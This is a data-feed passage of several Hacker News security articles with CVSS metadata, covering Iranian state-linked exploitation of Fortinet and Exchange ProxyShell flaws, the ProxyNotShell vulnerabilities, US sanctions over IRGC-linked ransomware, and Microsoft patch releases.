[released](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) a joint advisory warning of active exploitation of Fortinet and Microsoft Exchange ProxyShell vulnerabilities by Iranian state-sponsored actors to gain initial access to vulnerable systems for follow-on activities, including data exfiltration and ransomware.\n\nThe threat actor is believed to have leveraged multiple Fortinet FortiOS vulnerabilities dating back to March 2021 as well as a remote code execution flaw affecting Microsoft Exchange Servers since at least October 2021, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), and the U.K.'s National Cyber Security Centre (NCSC).\n\nThe agencies did not attribute the activities to a specific advanced persistent threat (APT) actor. Targeted victims include Australian organizations and a wide range of entities across multiple U.S. critical infrastructure sectors, such as transportation and healthcare. The list of flaws being exploited are below \u2014\n\n * [**CVE-2021-34473**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) (CVSS score: 9.1) - Microsoft Exchange Server remote code execution vulnerability (aka \"[ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>)\")\n * [**CVE-2020-12812**](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>) (CVSS score: 9.8) - [FortiOS SSL VPN 2FA bypass](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) by changing username case\n * [**CVE-2019-5591**](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) (CVSS score: 6.5) - FortiGate [default configuration](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) does not verify the LDAP server identity\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - [FortiOS system file leak](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>) through SSL VPN via specially crafted HTTP resource requests\n\nBesides exploiting the ProxyShell flaw to gain access to vulnerable networks, CISA and FBI said they observed the adversary abusing a Fortigate appliance in May 2021 to gain a foothold to a web server hosting the domain for a U.S. municipal government. The next month, the APT actors \"exploited a Fortigate appliance to access environmental control networks associated with a U.S.-based hospital specializing in healthcare for children,\" the advisory said.\n\nThe development marks the second time the U.S. government has [alerted](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 to compromise systems belonging to government and commercial entities.\n\nAs mitigations, the agencies are recommending organizations to immediately patch software affected by the aforementioned vulnerabilities, enforce data backup and restoration procedures, implement network segmentation, secure accounts with multi-factor authentication, and patch operating systems, software, and firmware as and when updates are released.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T15:44:00", "type": "thn", "title": "U.S., U.K. and Australia Warn of Iranian Hackers Exploiting Microsoft, Fortinet Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-34473"], "modified": "2021-11-22T07:14:13", "id": "THN:C3B82BB0558CF33CFDC326E596AF69C4", "href": "https://thehackernews.com/2021/11/us-uk-and-australia-warn-of-iranian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-04T12:04:40", "description": "[![ProxyNotShell](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6538WifO-pQPlUhACBuUX_jTbrSpW305DDSQv2XtGhWolinz3L4Hgy3yckiql7NJG9L9tFcb9ZFIPr1a1yBf9bvlyuXOAhhxdrgegxaIMeSIxRzX7JFkUbAULNHo8UzppH76EuY77JOotsyc1FYph-TCqk5DAr4GPj--2TvKuoLT8Tucw6ssJeCOa/s728-e1000/proxynotshell.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6538WifO-pQPlUhACBuUX_jTbrSpW305DDSQv2XtGhWolinz3L4Hgy3yckiql7NJG9L9tFcb9ZFIPr1a1yBf9bvlyuXOAhhxdrgegxaIMeSIxRzX7JFkUbAULNHo8UzppH76EuY77JOotsyc1FYph-TCqk5DAr4GPj--2TvKuoLT8Tucw6ssJeCOa/s728-e100/proxynotshell.jpg>)\n\nNicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082 that allows Remote Code Execution (RCE) when PowerShell is available to unidentified attackers.\n\nBased on ProxyShell, this new zero-day abuse risk leverage a chained attack similar to the one used in the 2021 ProxyShell attack that exploited the combination of multiple vulnerabilities - CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207 \u2013 to permit a remote actor to execute arbitrary code.\n\nDespite the potential severity of attacks using them, ProxyShell vulnerabilities are still on CISA's list of top 2021 routinely exploited vulnerabilities.\n\n## Meet ProxyNotShell \n\nRecorded on September 19, 2022, CVE-2022-41082 is an attack vector targeting Microsoft's Exchange Servers, enabling attacks of low complexity with low privileges required. Impacted services, if vulnerable, enable an authenticated attacker to compromise the underlying exchange server by leveraging existing exchange PowerShell, which could result in a full compromise.\n\nWith the help of CVE-2022-41040, another Microsoft vulnerability also recorded on September 19, 2022, an attacker can remotely trigger CVE-2022-41082 to remotely execute commands.\n\nThough a user needs to have the privilege to access CVE-2022-41040, which should curtail the vulnerability accessibility to attackers, the required level of privilege is low.\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure.\n\nBoth vulnerabilities were uncovered during an active attack against GTSC, a Vietnamese organization called GTSC, granting attackers access to some of their clients. Though neither vulnerability on its own is particularly dangerous, exploits chaining them together could potentially lead to catastrophic breaches.\n\nThe chained vulnerabilities could grant an outsider attacker the ability to read emails directly off an organization's server the ability to breach the organization with CVE-2022-41040 Remote Code Execution and implant malware on the organization's Exchange Server with CVE-2022-41082.\n\nThough it appears that attackers would need some level of authentication to activate the chained vulnerabilities exploit, the exact level of authentication required \u2013 rated \"Low\" by Microsoft \u2013 is not yet clarified. Yet, this required low authentication level should effectively prevent a massive, automated attack targeting every Exchange server around the globe. This hopefully will prevent a replay of the 2021 ProxyShell debacle.\n\nYet, finding a single valid email address/password combination on a given Exchange server should not be overly difficult, and, as this attack bypasses MFA or FIDO token validation to log into Outlook Web Access, a single compromised email address/password combination is all that is needed.\n\n## Mitigating ProxyNotShell Exposure\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure of unknown efficacy.\n\nBlocking incoming traffic to Exchange Servers holding critical asserts is also an option, though only practicable if such a measure does not impact vital operations and should ideally be perceived as a temporary measure pending Microsoft's issuance of a verified patch.\n\n## Assessing ProxyNotShell Exposure\n\nAs the current mitigation options are either of unverified efficacy or potentially damaging to the smooth running of operations, evaluating the degree of exposure to ProxyNotShell might prevent taking potentially disruptive unnecessary preventative measures, or indicate which assets to preemptively migrate to unexposed servers.\n\nCymulate Research Lab has developed a [custom-made assessment for ProxyNotShell](<https://cymulate.com/free-trial/>) that enable organizations to estimate exactly their degree of exposure to ProxyNotShell.\n\nA ProxyNotShell attack vector has been added to the advanced scenarios templates, and running it on your environment yields the necessary information to validate exposure \u2013 or lack thereof - to ProxyNotShell.\n\n[![ProxyNotShell](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgOoxz7w2_H46l72-JIWEEozP6gnLHfSQt_wbm1RRkjB0NOn2rBaB0wW4-jBFx4wbMgPAmXZvOdPPwjnUFX2u8zbdJZLSXKMAoft6Skt3EXk_gH1ehXK9DLBpHKouidVH9WE9P1SQs3h-s1VAfGKtHqeXaxkjtGS4lDIItWgmQo1FSLk_6z6fV7ZtQw/s728-e1000/222.png)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgOoxz7w2_H46l72-JIWEEozP6gnLHfSQt_wbm1RRkjB0NOn2rBaB0wW4-jBFx4wbMgPAmXZvOdPPwjnUFX2u8zbdJZLSXKMAoft6Skt3EXk_gH1ehXK9DLBpHKouidVH9WE9P1SQs3h-s1VAfGKtHqeXaxkjtGS4lDIItWgmQo1FSLk_6z6fV7ZtQw/s728-e100/222.png>)\n\n[![ProxyNotShell](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiqGWTwc-0vwEKrwSp1s7coId4IRI3KelQKVBG1iXsx0N32996O0Lprr0PA035V1oLkFpdjQ1euXlqcL0le7gsuWoWI9NSCEBW0Nj-OCQZn8ovDyuK-b-MtVYhjKmGIWuZO5IkdqNRBvKSiWttxGP46GmxjlZtpI_FSz2728WiqkvKTOoOJIp0KrjOH/s728-e1000/111.png)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiqGWTwc-0vwEKrwSp1s7coId4IRI3KelQKVBG1iXsx0N32996O0Lprr0PA035V1oLkFpdjQ1euXlqcL0le7gsuWoWI9NSCEBW0Nj-OCQZn8ovDyuK-b-MtVYhjKmGIWuZO5IkdqNRBvKSiWttxGP46GmxjlZtpI_FSz2728WiqkvKTOoOJIp0KrjOH/s728-e100/111.png>)\n\nUntil verified patches are available from Microsoft, assessing exposure to ProxyNotShell to evaluate exactly which servers are potential targets is the most cost-efficient way to evaluate exactly which assets are exposed and devise targeted preemptive measures with maximum impact.\n\n_Note: This article is contributed by [Cymulate Research Labs](<https://cymulate.com/>)._\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T08:05:00", "type": "thn", "title": "ProxyNotShell \u2013 the New Proxy Hell?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-04T10:19:04", "id": "THN:54023E40C0AA4CB15793A39F3AF102AB", "href": "https://thehackernews.com/2022/10/proxynotshell-new-proxy-hell.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-16T04:03:41", "description": "[![Iranian Hackers](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjUqmffIx48KtQdHxTXb4TQfvElel4yvoLc_Uq-nF3atp_DnKXEvX_r4s4FR-V9kItxokvkUgH3L-QP1uH3JrII_VtRNnXYXU3EYxwsreIbOgCkHKHN4AbWxtUPY5tKaH8u6YvYBd2oA_JReHSU1gNdaKY11tzzrlCHhUSTJzZr4yGRgnN-fUCAb2Mv/s728-e1000/iranian-hackers.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjUqmffIx48KtQdHxTXb4TQfvElel4yvoLc_Uq-nF3atp_DnKXEvX_r4s4FR-V9kItxokvkUgH3L-QP1uH3JrII_VtRNnXYXU3EYxwsreIbOgCkHKHN4AbWxtUPY5tKaH8u6YvYBd2oA_JReHSU1gNdaKY11tzzrlCHhUSTJzZr4yGRgnN-fUCAb2Mv/s728-e100/iranian-hackers.jpg>)\n\nThe U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sweeping sanctions against ten individuals and two entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks at least since October 2020.\n\nThe agency said the cyber activity mounted by the individuals is partially attributable to intrusion sets tracked under the names APT35, Charming Kitten, Nemesis Kitten, Phosphorus, and TunnelVision.\n\n\"This group has launched extensive campaigns against organizations and officials across the globe, particularly targeting U.S. and Middle Eastern defense, diplomatic, and government personnel, as well as private industries including media, energy, business services, and telecommunications,\" the Treasury [said](<https://home.treasury.gov/news/press-releases/jy0948>).\n\nThe Nemesis Kitten actor, which is also known as [Cobalt Mirage](<https://thehackernews.com/2022/05/iranian-hackers-leveraging-bitlocker.html>), [DEV-0270](<https://thehackernews.com/2022/09/microsoft-warns-of-ransomware-attacks.html>), and [UNC2448](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>), has come under the scanner in recent months for its pattern of ransomware attacks for opportunistic revenue generation using Microsoft's built-in BitLocker tool to encrypt files on compromised devices.\n\nMicrosoft and Secureworks have characterized DEV-0270 as a subgroup of [Phosphorus](<https://thehackernews.com/2022/09/iranian-hackers-target-high-value.html>) (aka Cobalt Illusion), with ties to another actor referred to as [TunnelVision](<https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html>). The Windows maker also assessed with low confidence that \"some of DEV-0270's ransomware attacks are a form of moonlighting for personal or company-specific revenue generation.\"\n\nWhat's more, independent analyses from the two cybersecurity firms as well as Google-owned [Mandiant](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>) has revealed the group's connections to two companies Najee Technology (which functions under the aliases Secnerd and Lifeweb) and Afkar System, both of which have been subjected to U.S. sanctions.\n\nIt's worth noting that Najee Technology and Afkar System's connections to the Iranian intelligence agency were first flagged by an anonymous anti-Iranian regime entity called [Lab Dookhtegan](<https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html>) [earlier](<https://mobile.twitter.com/LabDookhtegan2/status/1520355269695442945>) this [year](<https://mobile.twitter.com/LabDookhtegan2/status/1539960629867401218>).\n\n\"The model of Iranian government intelligence functions using contractors blurs the lines between the actions tasked by the government and the actions that the private company takes on its own initiative,\" Secureworks said in a [new report](<https://www.secureworks.com/blog/opsec-mistakes-reveal-cobalt-mirage-threat-actors>) detailing the activities of Cobalt Mirage.\n\nWhile exact links between the two companies and IRGC remain unclear, the method of private Iranian firms acting as fronts or providing support for intelligence operations is well established over the years, including that of [ITSecTeam (ITSEC), Mersad](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>), [Emennet Pasargad](<https://thehackernews.com/2021/11/us-charged-2-iranians-hackers-for.html>), and [Rana Intelligence Computing Company](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>).\n\nOn top of that, the Secureworks probe into a June 2022 Cobalt Mirage incident showed that a PDF file containing the ransom note was created on December 17, 2021, by an \"Ahmad Khatibi\" and timestamped at UTC+03:30 time zone, which corresponds to the Iran Standard Time. Khatibi, incidentally, happens to be the CEO and owner of the Iranian company Afkar System.\n\nAhmad Khatibi Aghda is also part of the 10 individuals sanctioned by the U.S., alongside Mansour Ahmadi, the CEO of Najee Technology, and other employees of the two enterprises who are said to be complicit in targeting various networks globally by leveraging well-known security flaws to gain initial access to further follow-on attacks.\n\nSome of the [exploited flaws](<https://www.cisa.gov/uscert/ncas/alerts/aa22-257a>), according to a [joint cybersecurity advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/14/iranian-islamic-revolutionary-guard-corps-affiliated-cyber-actors>) released by Australia, Canada, the U.K., and the U.S., as part of the IRGC-affiliated actor activity are as follows -\n\n * Fortinet FortiOS path traversal vulnerability ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>))\n * Fortinet FortiOS default configuration vulnerability ([CVE-2019-5591](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * Fortinet FortiOS SSL VPN 2FA bypass vulnerability ([CVE-2020-12812](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), and\n * [Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) (CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105)\n\n\"Khatibi is among the cyber actors who gained unauthorized access to victim networks to encrypt the network with BitLocker and demand a ransom for the decryption keys,\" the U.S. government said, in addition to adding him to the FBI's [Most Wanted list](<https://www.fbi.gov/wanted/cyber/ahmad-khatibi-aghda>).\n\n\"He leased network infrastructure used in furtherance of this malicious cyber group's activities, he participated in compromising victims' networks, and he engaged in ransom negotiations with victims.\"\n\nCoinciding with the sanctions, the Justice Department separately [indicted](<https://www.justice.gov/usao-nj/pr/three-iranian-nationals-charged-engaging-computer-intrusions-and-ransomware-style>) Ahmadi, Khatibi, and a third Iranian national named Amir Hossein Nickaein Ravari for engaging in a criminal extortion scheme to inflict damage and losses to victims located in the U.S., Israel, and Iran.\n\nAll three individuals have been charged with one count of conspiring to commit computer fraud and related activity in connection with computers; one count of intentionally damaging a protected computer; and one count of transmitting a demand in relation to damaging a protected computer. Ahmadi has also been charged with one more count of intentionally damaging a protected computer.\n\nThat's not all. The U.S. State Department has also [announced monetary rewards](<https://www.state.gov/sanctioning-iranians-for-malicious-cyber-acts/>) of up to $10 million for any information about [Mansour, Khatibi, and Nikaeen](<https://rewardsforjustice.net/index/?jsf=jet-engine:rewards-grid&tax=cyber:3266>) and their whereabouts.\n\n\"These defendants may have been hacking and extorting victims \u2013 including critical infrastructure providers \u2013 for their personal gain, but the charges reflect how criminals can flourish in the safe haven that the Government of Iran has created and is responsible for,\" Assistant Attorney General Matthew Olsen said.\n\nThe development comes close on the heels of [sanctions](<https://thehackernews.com/2022/09/us-imposes-new-sanctions-on-iran-over.html>) imposed by the U.S. against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-15T06:49:00", "type": "thn", "title": "U.S. Charges 3 Iranian Hackers and Sanctions Several Others Over Ransomware Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-09-16T03:17:57", "id": "THN:802C6445DD27FFC7978D22CC3182AD58", "href": "https://thehackernews.com/2022/09/us-charges-3-iranian-hackers-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:14", "description": "[![Microsoft Exchange Servers](https://thehackernews.com/images/-4bW5O7qDy3g/YRY939zQM4I/AAAAAAAADho/RUV3iIGj654Ml8xKhGo8MXIEWtGwsL1ywCLcBGAsYHQ/s728-e1000/ms-exchnage.jpg)](<https://thehackernews.com/images/-4bW5O7qDy3g/YRY939zQM4I/AAAAAAAADho/RUV3iIGj654Ml8xKhGo8MXIEWtGwsL1ywCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nThreat actors are actively carrying out opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using a new exploit chain leveraging a trio of flaws affecting on-premises installations, making them the latest set of bugs after ProxyLogon vulnerabilities were exploited en masse at the start of the year.\n\nThe remote code execution flaws have been collectively dubbed \"ProxyShell.\" At least 30,000 machines are affected by the vulnerabilities, [according](<https://isc.sans.edu/diary/27732>) to a Shodan scan performed by Jan Kopriva of SANS Internet Storm Center.\n\n\"Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,\" NCC Group's Richard Warren [tweeted](<https://twitter.com/buffaloverflow/status/1425831100157349890>), noting that one of the intrusions resulted in the deployment of a \"C# aspx webshell in the /aspnet_client/ directory.\"\n\nPatched in early March 2021, [ProxyLogon](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/>) is the moniker for CVE-2021-26855, a server-side request forgery vulnerability in Exchange Server that permits an attacker to take control of a vulnerable server as an administrator, and which can be chained with another post-authentication arbitrary-file-write vulnerability, CVE-2021-27065, to achieve code execution.\n\nThe vulnerabilities came to light after Microsoft [spilled the beans](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) on a Beijing-sponsored hacking operation that leveraged the weaknesses to strike entities in the U.S. for purposes of exfiltrating information in what the company described as limited and targeted attacks.\n\nSince then, the Windows maker has fixed six more flaws in its mail server component, two of which are called [ProxyOracle](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-2-ProxyOracle/>), which enables an adversary to recover the user's password in plaintext format.\n\nThree other issues \u2014 known as ProxyShell \u2014 could be abused to bypass ACL controls, elevate privileges on Exchange PowerShell backend, effectively authenticating the attacker and allowing for remote code execution. Microsoft noted that both CVE-2021-34473 and CVE-2021-34523 were inadvertently omitted from publication until July.\n\n**ProxyLogon:**\n\n * [**CVE-2021-26855**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-26857**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-26858**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-27065**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n\n**ProxyOracle:**\n\n * [**CVE-2021-31195**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on May 11)\n * [**CVE-2021-31196**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31196>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on July 13)\n\n**ProxyShell:**\n\n * [**CVE-2021-31207**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) \\- Microsoft Exchange Server Security Feature Bypass Vulnerability (Patched on May 11)\n * [**CVE-2021-34473**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on April 13, advisory released on July 13)\n * [**CVE-2021-34523**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \\- Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on April 13, advisory released on July 13)\n\n**Other:**\n\n * [**CVE-2021-33768**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33768>) \\- Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on July 13)\n\nOriginally demonstrated at the [Pwn2Own hacking competition](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) this April, technical details of the ProxyShell attack chain were disclosed by DEVCORE researcher Orange Tsai at the [Black Hat USA 2021](<https://www.blackhat.com/us-21/briefings/schedule/index.html#proxylogon-is-just-the-tip-of-the-iceberg-a-new-attack-surface-on-microsoft-exchange-server-23442>) and [DEF CON](<https://www.youtube.com/watch?v=5mqid-7zp8k>) security conferences last week. To prevent exploitation attempts, organizations are highly recommended to install updates released by Microsoft.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-13T09:46:00", "type": "thn", "title": "Hackers Actively Searching for Unpatched Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31195", "CVE-2021-31196", "CVE-2021-31207", "CVE-2021-33768", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-13T09:46:09", "id": "THN:FA40708E1565483D14F9A31FC019FCE1", "href": "https://thehackernews.com/2021/08/hackers-actively-searching-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:21", "description": "[![](https://thehackernews.com/images/-aVEUxlp9r9o/YO5q47NA_bI/AAAAAAAADL4/tkntZNY2smU5FPaAkTU1qBYUg8VPhp8NACLcBGAsYHQ/s0/windows-update-download.jpg)](<https://thehackernews.com/images/-aVEUxlp9r9o/YO5q47NA_bI/AAAAAAAADL4/tkntZNY2smU5FPaAkTU1qBYUg8VPhp8NACLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nMicrosoft rolled out [Patch Tuesday updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jul>) for the month of July with fixes for a total of 117 security vulnerabilities, including nine zero-day flaws, of which four are said to be under active attacks in the wild, potentially enabling an adversary to take control of affected systems. \n\nOf the 117 issues, 13 are rated Critical, 103 are rated Important, and one is rated as Moderate in severity, with six of these bugs publicly known at the time of release. \n\nThe updates span across several of Microsoft's products, including Windows, Bing, Dynamics, Exchange Server, Office, Scripting Engine, Windows DNS, and Visual Studio Code. July also marks a dramatic jump in the volume of vulnerabilities, surpassing the number Microsoft collectively addressed as part of its updates in [May](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) (55) and [June](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>) (50).\n\nChief among the security flaws actively exploited are as follows \u2014\n\n * **CVE-2021-34527** (CVSS score: 8.8) - Windows Print Spooler Remote Code Execution 